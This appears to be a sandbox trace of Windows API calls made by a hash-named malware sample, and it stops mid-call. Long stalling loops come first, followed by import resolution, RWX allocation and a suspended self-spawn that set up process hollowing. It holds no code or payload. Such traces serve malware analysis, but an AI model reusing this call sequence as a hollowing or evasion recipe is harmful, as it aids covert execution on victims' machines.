GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.640] SetLastError (dwErrCode=0x0) [0068.640] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.641] SetLastError (dwErrCode=0x0) [0068.641] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.642] SetLastError (dwErrCode=0x0) [0068.642] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.643] GetLastError () returned 0x0 [0068.643] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.644] GetLastError () returned 0x0 [0068.644] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.645] GetLastError () returned 0x0 [0068.645] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.646] GetLastError () returned 0x0 [0068.646] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.647] GetLastError () returned 0x0 [0068.647] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetLastError () returned 0x0 [0068.648] SetLastError (dwErrCode=0x0) [0068.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74650000 [0068.649] GetProcAddress (hModule=0x74650000, lpProcName="LocalAlloc") returned 0x74667a30 [0068.649] LocalAlloc (uFlags=0x0, uBytes=0x7fd8) returned 0x6d1f48 [0068.649] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtect") returned 0x74667a50 [0068.650] VirtualProtect (in: lpAddress=0x6d1f48, dwSize=0x7fd8, flNewProtect=0x40, lpflOldProtect=0x19febc | out: lpflOldProtect=0x19febc*=0x4) returned 1 [0068.651] GetProcessId (Process=0x0) returned 0x0 [0068.651] GetProcessId (Process=0x0) returned 0x0 [0068.651] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.652] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.653] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.654] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.655] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.656] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.657] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.658] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.659] GetProcessId (Process=0x0) returned 0x0 [0068.660] GetProcessId (Process=0x0) returned 0x0 [0068.660] GetProcessId (Process=0x0) returned 0x0 [0068.686] GetProcessId (Process=0x0) returned 0x0 [0068.686] GetProcessId (Process=0x0) returned 0x0 [0068.686] GetProcessId (Process=0x0) returned 0x0 [0068.686] GetProcessId (Process=0x0) returned 0x0 [0068.686] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.687] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.688] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.689] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.690] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0068.691] GetProcessId (Process=0x0) returned 0x0 [0074.111] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0074.112] GetProcAddress (hModule=0x74650000, lpProcName="GlobalAlloc") returned 0x74669950 [0074.112] GetProcAddress (hModule=0x74650000, lpProcName="GetLastError") returned 0x74663870 [0074.112] GetProcAddress (hModule=0x74650000, lpProcName="Sleep") returned 0x74667990 [0074.113] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0074.113] GetProcAddress (hModule=0x74650000, lpProcName="CreateToolhelp32Snapshot") returned 0x74677b50 [0074.113] GetProcAddress (hModule=0x74650000, lpProcName="Module32First") returned 0x746944b0 [0074.113] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0074.113] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xac [0074.121] Module32First (hSnapshot=0xac, lpme=0x19fc50) returned 1 [0074.122] VirtualAlloc (lpAddress=0x0, dwSize=0x8ba0, flAllocationType=0x1000, flProtect=0x40) returned 0x4c0000 [0074.125] LoadLibraryA (lpLibFileName="user32") returned 0x74790000 [0074.125] GetProcAddress (hModule=0x74790000, lpProcName="MessageBoxA") returned 0x7480fec0 [0074.125] GetProcAddress (hModule=0x74790000, lpProcName="GetMessageExtraInfo") returned 0x747c3690 [0074.125] LoadLibraryA (lpLibFileName="kernel32") returned 0x74650000 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="WinExec") returned 0x7468ff70 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="CreateFileA") returned 0x74676880 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="WriteFile") returned 0x74676ca0 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="CloseHandle") returned 0x74676630 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="CreateProcessA") returned 0x74690750 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="GetThreadContext") returned 0x7466ec60 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAlloc") returned 0x74667810 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="VirtualAllocEx") returned 0x74692730 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="VirtualFree") returned 0x74667600 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="ReadProcessMemory") returned 0x74691c80 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="WriteProcessMemory") returned 0x74692850 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="SetThreadContext") returned 0x74692490 [0074.126] GetProcAddress (hModule=0x74650000, lpProcName="ResumeThread") returned 0x7466a800 [0074.127] GetProcAddress (hModule=0x74650000, lpProcName="WaitForSingleObject") returned 0x74676820 [0074.127] GetProcAddress (hModule=0x74650000, lpProcName="GetModuleFileNameA") returned 0x7466a720 [0074.127] GetProcAddress (hModule=0x74650000, lpProcName="GetCommandLineA") returned 0x7466ab60 [0074.127] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x778f0000 [0074.127] GetProcAddress (hModule=0x778f0000, lpProcName="NtUnmapViewOfSection") returned 0x77966f40 [0074.127] GetProcAddress (hModule=0x778f0000, lpProcName="NtWriteVirtualMemory") returned 0x77967040 [0074.127] GetProcAddress (hModule=0x74790000, lpProcName="RegisterClassExA") returned 0x747c4e90 [0074.127] GetProcAddress (hModule=0x74790000, lpProcName="CreateWindowExA") returned 0x747c6f30 [0074.128] GetProcAddress (hModule=0x74790000, lpProcName="PostMessageA") returned 0x747bf0e0 [0074.128] GetProcAddress (hModule=0x74790000, lpProcName="GetMessageA") returned 0x747be130 [0074.128] GetProcAddress (hModule=0x74790000, lpProcName="DefWindowProcA") returned 0x7797aed0 [0074.128] GetProcAddress (hModule=0x74650000, lpProcName="GetFileAttributesA") returned 0x74676a20 [0074.128] GetProcAddress (hModule=0x74650000, lpProcName="GetStartupInfoA") returned 0x74669c10 [0074.128] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtectEx") returned 0x74692790 [0074.128] GetProcAddress (hModule=0x74650000, lpProcName="ExitProcess") returned 0x74677b30 [0074.128] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0074.129] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0074.129] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0074.129] RegisterClassExA (param_1=0x19f90c) returned 0xc1de [0074.130] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x401fc [0078.829] PostMessageA (hWnd=0x401fc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0078.829] GetMessageA (in: lpMsg=0x19f93c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f93c) returned 1 [0078.830] GetMessageA (in: lpMsg=0x19f93c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f93c) returned 1 [0078.830] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x4f0000 [0078.830] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4f0000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe")) returned 0x62 [0078.830] GetStartupInfoA (in: lpStartupInfo=0x19f860 | out: lpStartupInfo=0x19f860*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0078.830] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" " [0078.831] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f860*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x19f8b8 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe\" ", 